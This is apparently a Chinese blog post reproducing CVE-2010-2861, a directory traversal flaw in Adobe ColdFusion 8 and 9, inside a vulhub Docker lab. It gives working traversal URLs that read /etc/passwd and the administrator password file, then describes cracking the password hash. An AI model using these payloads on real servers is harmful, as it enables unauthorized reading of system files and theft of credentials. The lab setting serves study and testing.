CVE-2010-2861

Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)复现

一、实验所需环境

1、Ubuntu

2、vulhub

3、coldfusion/CVE-2010-2861

二、漏洞介绍

Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。
Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。

三、漏洞复现

(1)进入vulhub,选择coldfusion/CVE-2010-2861漏洞环境,
输入命令启动:docker-compose up -d

(2)环境启动可能需要1~5分钟,启动后,访问http://your-ip:8500/CFIDE/administrator/enter.cfm,可以看到初始化页面,输入密码admin,开始初始化整个环境。


(3)使用Burp Suite抓包,直接访问http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en,即可读取文件/etc/passwd:


(4)读取后台管理员密码http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en


(5)将密文复制到解密网站进行解密,解密后获取文明密码为:admin

参考链接:

posted @ 2022-06-04 15:55  Zovt  阅读(288)  评论(0编辑  收藏  举报